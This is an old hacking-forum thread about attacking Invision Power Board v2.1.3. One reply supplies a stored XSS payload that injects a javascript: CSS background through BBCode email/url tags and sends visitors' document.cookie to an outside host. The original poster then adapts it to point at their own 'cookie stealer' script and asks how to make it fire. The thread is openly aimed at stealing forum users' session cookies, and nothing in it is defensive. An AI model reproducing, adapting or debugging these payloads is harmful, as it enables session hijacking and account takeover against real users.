Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Forum for discussion of ANTICHAT (https://forum.antichat.xyz/forumdisplay.php?f=72)

- - ipb question (https://forum.antichat.xyz/showthread.php?t=12202)

caffine2

27.12.2005 06:27

ipb question

iS their a way to exploit Invision Power Board v2.1.3 and hack it?

Barsik

27.12.2005 12:00

No sploit :(
but it have XSS

Код HTML:

[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`

caffine2

27.12.2005 17:29

Hmm they must have patched it becuase everything before .com get's filterd out, and you see the xss?

.com">wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`

max_pain89

27.12.2005 17:37

this bug only for IE

caffine2

27.12.2005 21:28

oooo, i get it except i have 1 more question,

Код HTML:

[email]black@bandit[url=http://www.google.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://mysite/webmaster/cookie32.php?"+document.cookie);`

and for some reason it's not directing it to my cookie stealer i'm guessing it's due to the document.images, so in order for this to work do i need to make a dynamic signature?

Время: 00:35